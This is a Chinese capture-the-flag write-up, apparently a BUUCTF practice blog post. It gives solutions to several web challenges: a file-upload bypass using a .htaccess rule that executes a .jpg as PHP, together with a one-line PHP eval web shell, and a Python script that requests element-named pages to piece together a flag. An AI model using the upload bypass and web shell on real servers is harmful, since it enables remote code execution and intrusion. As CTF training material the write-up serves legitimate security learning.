• BUUCTF刷题


    [GXYCTF2019]BabyUpload

    .htaccess

    记得绕过Content-Type:image/jpeg

    <FilesMatch "h3zh1.jpg"> 
        SetHandler application/x-httpd-php
    </FilesMatch>
    

    h3zh1.jpg

    <script language="php">   
       eval($_POST['cmd']);
    </script>
    

    [BJDCTF 2nd]elementmaster

    会python编写就好

    这个题头秃,还记得初三时背元素周期表得恐惧。

    import requests
    url = "http://15330266-3d24-4154-9cb8-ad6a25f8ed02.node3.buuoj.cn/"
    
    a_list=['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
            'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
            'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
            'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
            'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
            'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
            'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
    flag = ""
    for i in a_list:
    	r = requests.get(url+i+".php")
    	if(r.status_code==200):#一定得写200因为不是每个元素都存在
    	#	print(url+i+".php")
    		flag += r.text
    		print(flag)
    

    [BJDCTF 2nd]Schrödinger

    这个题我觉得就记一个时间戳这个知识点就好。

    大师傅也说这个题辣眼睛。

    做题唯一感受,离谱~。

    151H0ZQPXMFRYYQT6@3WIS2

    ca

  • 相关阅读:
    set集合
    作业(2)
    字典
    列表功能
    字符串
    while循环
    pb加密转换成C#
    NET在64位系統使用32位oracle客户端访问数据库
    SQL Server中查找包含某个文本的存储过程
    SQLServer 错误: 15404,无法获取有关 Windows NT 组/用户
  • 原文地址:https://www.cnblogs.com/h3zh1/p/12839150.html
Copyright © 2020-2023  润新知